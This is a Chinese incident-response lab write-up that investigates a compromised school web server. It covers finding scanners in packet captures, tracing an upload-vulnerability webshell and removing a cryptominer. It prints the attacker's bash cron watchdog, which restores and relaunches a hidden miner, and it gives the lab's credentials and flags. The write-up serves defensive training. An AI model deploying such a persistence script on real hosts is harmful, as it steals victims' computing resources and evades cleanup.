网站优化培训机构,wordpress双语网站,站长资讯,贵阳网站建设哪家公司好本篇文章主要记录某学校长期未运营维护的程序#xff0c;被黑客发现了漏洞#xff0c;但好在学校有全流量设备#xff0c;抓取到了过程中的流量包 需要你进行上机以及结合流量分析#xff0c;排查攻击者利用的漏洞以及上传利用成功的木马 文章目录 靶机介绍1.使用工具分析共… 本篇文章主要记录某学校长期未运营维护的程序被黑客发现了漏洞但好在学校有全流量设备抓取到了过程中的流量包 需要你进行上机以及结合流量分析排查攻击者利用的漏洞以及上传利用成功的木马 文章目录 靶机介绍1.使用工具分析共有多少IP存在扫描web特征提交其数量2.在2025.6.22日17点03分27秒192.168.37.1055689端口进行访问的url路径以flag方式进行提交(应急三要素缩小范围)3.提交存在使用NMAP扫描特征的IP4.审计流量并结合web站点攻击者通过什么漏洞进行控制主机提交漏洞文件名接口5.审计流量并结合web站点攻击者通过哪个用户名利用的漏洞提交其注册用户名6. 审计流量并结合漏洞提交攻击者控制成功木马文件名7.审计流量并清除掉攻击者上传的木马清除成功后在/var/flag/1/flag中查看flag并提交8. 黑客拿到主机权限后上传了挖矿木马需要你提交矿池地址9.清除掉主机上的挖矿木马完成后在/var/flag/2/flag文件中查看flag并提交10. 黑客做了后门即使你清除以后仍然会定时更新挖矿程序并运行你找到这个程序提交其路径11.清除掉后门挖矿程序在/var/flag/3/flag下查看提交flag 靶机介绍 背景完全仿真了某学校长期未运营维护的程序被黑客发现了漏洞但好在学校有全流量设备抓取到了过程中的流量包 需要你进行上机以及结合流量分析排查攻击者利用的漏洞以及上传利用成功的木马 以及清除掉攻击者上传的挖矿程序以及后门程序挖矿环境完全还原了真实环境但不会出网比较有意义清除做了check操作你只需要按照相关题目引导进行清除 在指定目录下查看flag提交即可流量包在远程登录成功后/hacker2025.pcap(玄机直接以附件形式下载) 流量中被攻击机IP192.168.37.11 SSH远程端口2222 账号密码root/edusec123 下载地址点击此处 参考文章州弟学安全
要求 使用工具分析共有多少IP存在扫描web特征提交其数量在2025.6.22日17点03分27秒192.168.37.1055689端口进行访问的url路径以flag方式进行提交(应急三要素缩小范围)提交存在使用NMAP扫描特征的IP审计流量并结合web站点攻击者通过什么漏洞进行控制主机提交漏洞文件名接口审计流量并结合web站点攻击者通过哪个用户名利用的漏洞提交其注册用户名审计流量并结合漏洞提交攻击者控制成功木马文件名审计流量并清除掉攻击者上传的木马清除成功后在/var/flag/1/flag中查看flag并提交黑客拿到主机权限后上传了挖矿木马需要你提交矿池地址清除掉主机上的挖矿木马完成后在/var/flag/2/flag文件中查看flag并提交黑客做了后门即使你清除以后仍然会定时更新挖矿程序并运行你找到这个程序提交其路径清除掉后门挖矿程序在/var/flag/3/flag下查看提交flag –
1.使用工具分析共有多少IP存在扫描web特征提交其数量
这里我们打开靶机的同时也打开一台kali用于端口以及服务的扫描
这里由于两台机器属于同一网段所以直接使用nmap进行扫描
nmap 192.168.44.0/24显示结果如下
这时候我们得到目标机器的ip地址而题目中的“使用工具分析共有多少IP存在扫描web特征”需要我们进行流量分析
所以登录2222端口的服务输入账号密码 SSH远程端口2222 账号密码root / edusec123 随后即可链接成功 查看根目录发现hacker流量包把他下载到本地用工具进行分析 这里我是用xshell的xftp功能进行传输到本地 然后进行分析——查看有多少IP访问了192.168.37.11这个靶机可以使用命令 缺点需要一个个数比较耗时 http and ip.dst 192.168.37.11 # 筛选http协议且目的地址为靶机的IP地址也可以使用别的方法 然后进行过滤器条件如下进行筛选带有扫描特征的条件那么之前讲过怎么判断扫描特征 答短时间内大量访问不存在的文件属于扫描特征但是由于实战中每个站点文件不存在返回状态码不一致可能是404、403、500、502、405等情况那么我们可以自行测试 所以访问网站输入一个不存在的文件看看文件不存在的状态码是什么
可以看到是404所以我们就可以根据状态码进行筛选 http.response.code404也可以放进本地工具里进行分析 count() by 表示计数id.orig_h表示源地址status_code表示状态码|表示条件分隔 发现还剩IP地址为29个所以flag flag{29} –
2.在2025.6.22日17点03分27秒192.168.37.1055689端口进行访问的url路径以flag方式进行提交(应急三要素缩小范围) 这里题目给出的具体的时间范围结合实际情况的话 1 在企业中每天可以产生几十TB的数据要是遇到webshell入侵的话不可能一条一条去查找 2所以在确定时间范围的情况下去筛选排除就很有必要这就是此题的目的 根据题目输入命令
ip.addr 192.168.37.10 and ip.dst 192.168.37.11 and tcp.port 55689可以得到3条请求记录追踪http流进行查看 将他们的url分别尝试一次
/servlet/user/uploadAvatar
/servlet/user/profile?uploadSuccesstrue
/uploads/06853c4f-8b05-4949-90ae-9adc49f27a94.jsp分析
第一个请求看特征就知道是上传文件第二个看关键词就知道上传成功第三个应该是GET访问了上传的文件
所以这是一次任意文件上传攻击 这里根据题目应该是url路径但是最终结果却是一个文件名不懂 最终的flag为 flag{06853c4f-8b05-4949-90ae-9adc49f27a94.jsp} –
3.提交存在使用NMAP扫描特征的IP 通常情况下nmap扫描到web服务80或者8080端口就会在URL或者User-Agent里添加nmap字样很容易辨识。 除此之外nmap则会进行SYN扫描FIN扫描等。 NMAP最大特征 扫描 HTTP 时会在 URL 及 UA 里包含 nmap 关键字特征
http.request.headers contains Nmap
http.user_agent contains Nmap可以发现记录很容易得到攻击IP为192.168.37.4 假如对方没有扫描HTTP协议只进行了端口扫描 那么在nmap中使用TCP SYN扫描的情况下可以进行筛选。 基于 TCP 标志位SYN 扫描特征筛选 tcp.flags.syn 1 tcp.flags.ack 0 默认情况下大部分版本的nmap窗口大小为1024当然也有其它版本的扫描可能为2048,3072,4096 tcp.flags.syn 1 and tcp.window_size 1024 and tcp.len 0 and ip.frag_offset 0 如果不用tcp协议而用udp呢当然是问AI啊。 flag{192.168.37.4} –
4.审计流量并结合web站点攻击者通过什么漏洞进行控制主机提交漏洞文件名接口 根据之前的结果我们发现了任意文件上传的漏洞 第二个题目的时候看到了文件上传的操作
思路WEB 系统起码有文件上传功能如何确定可疑访问只查看正常状态码或排除非正常状态码后进行排序
这里还是使用工具进行筛选
count () by id.orig_h,status_code,uri|status_code200 | sort -r count然后去wireshark筛选一下 可以看到有三条访问记录进入查看内容冰蝎流量
这里很容易可以看出是冰蝎的流量而题目要求的是攻击者利用的漏洞接口所以查看上述流量包即可得到 flag{uploadAvatar} –
5.审计流量并结合web站点攻击者通过哪个用户名利用的漏洞提交其注册用户名
回到登录页面其实我们访问WEB端口看到是有鉴权的那么攻击者肯定是通过注册账号进去的有时候溯源账号可能会有很大的用处 以及账号密码的参数payload 所以可以根据上述进行筛选
ip.addr192.168.37.10http.request.uri/servlet/user/login 得到结果
可以发现输入账号密码后跳转到了index.jsp页面 flag{wangyunqing} –
6. 审计流量并结合漏洞提交攻击者控制成功木马文件名
根据之前的分析可以知道这个jsp文件访问的次数最多
ip.addr192.168.37.10http.request.uri/uploads/70b86b64-ce15-46bf-8095-4764809e2ee5.jsp 随便点击进去查看可以发现有着加密的异常流量 这里使用蓝队解密工具进行分析由于是冰蝎的默认密钥加密所以点击“解密”即可 多看几个发现了木马的文件名 flag{70b86b64-ce15-46bf-8095-4764809e2ee5.jsp} –
7.审计流量并清除掉攻击者上传的木马清除成功后在/var/flag/1/flag中查看flag并提交 check操作就是检测我们是否清除了木马因为以往我们只能被动去做题没有check有很大局限性比如增删改操作所以当我们做了清除操作后flag会在主机指定文件生成 登录靶机匹配木马的文件位置然后进行删除
find / -name *809e2ee5.jsp
# 这里匹配全部名字反而找不到也是找到了文件路径
直接删除即可
rm -rf /var/lib/tomcat9/webapps/ROOT/uploads/70b86b64-002dce15-002d46bf-002d8095-002d4764809e2ee5.jsp随后即可得到flag flag{1979c46c2af37dc62a4b05881e816995} –
8. 黑客拿到主机权限后上传了挖矿木马需要你提交矿池地址
使用top命令进行查看cpu使用情况发现了异常 名为java的程序使用资源异常且PID为913 随后ps -ef 913 查看具体情况发现矿马 位于/tmp目录下将其下载下来进行反编译 可以找到矿池IP
放进微步在线分析一下 flag{pool.minexmr.com:4444} –
9.清除掉主机上的挖矿木马完成后在/var/flag/2/flag文件中查看flag并提交
这里删除一下miner.jar文件查看flag即可
rm -rf miner.jarflag{da236fe0cda81bfc03d022799589110e} –
10. 黑客做了后门即使你清除以后仍然会定时更新挖矿程序并运行你找到这个程序提交其路径 我们删除后发现过了不久恶意进程又重新启动所以推测存在cron定时任务 新的PID 首先排查计划任务
crontab -l
ls -la /etc/cron*可以发现一个定时任务每分钟运行 随后检查/etc/cron 目录下没有发现异常
查看这个sh文件的具体内容 #!/bin/bashSOURCE_FILE/usr/share/.miner/miner.jar
DEST_FILE/tmp/miner.jar
PROCESS_NAMEjava -jar $DEST_FILE
LOG_FILE/var/log/.malware_events.logif pgrep -f $PROCESS_NAME /dev/null; thenexit 0
elseecho [$(date)] Miner process not found. Taking action... $LOG_FILEif [ ! -f $DEST_FILE ]; thenecho [$(date)] Miner file ($DEST_FILE) is missing. Restoring from backup... $LOG_FILEcp $SOURCE_FILE $DEST_FILEchmod x $DEST_FILEfiif [ -f $DEST_FILE ]; thennohup java -jar $DEST_FILE /dev/null 21 echo [$(date)] Miner process restarted with PID $!. $LOG_FILEelseecho [$(date)] CRITICAL: Could not restore miner file from backup. Cannot start. $LOG_FILEfi
fi 这段 Bash 脚本是 恶意挖矿程序的守护脚本作用是
监控检查 java -jar /tmp/miner.jar 挖矿进程是否运行自恢复若进程/程序文件丢失从隐藏备份/usr/share/.miner/miner.jar恢复并重启隐蔽性日志藏系统目录进程后台静默运行持续偷算力挖矿
危害占满服务器资源拖垮业务、增加成本需立即清理文件、进程并溯源 。 flag{/usr/share/.per/persistence.sh} –
11.清除掉后门挖矿程序在/var/flag/3/flag下查看提交flag 首先就是先清除定时任务然后再去删除脚本文件jar包 crontab -e //编辑计划任务清除掉计划任务
rm /usr/share/.per/persistence.sh //删除掉后门脚本程序
rm /usr/share/.miner/miner.jarh //删除备份挖矿程序
rm /tmp/miner.jar //删除已恢复的挖矿脚本
kill -9 (PID) //杀掉挖矿进程等待一分钟过后CPU和进程都恢复正常查看/var/flag/3/flag文件获取到flag flag{27bd067769b51ed71f899c7a6f08af2c} –
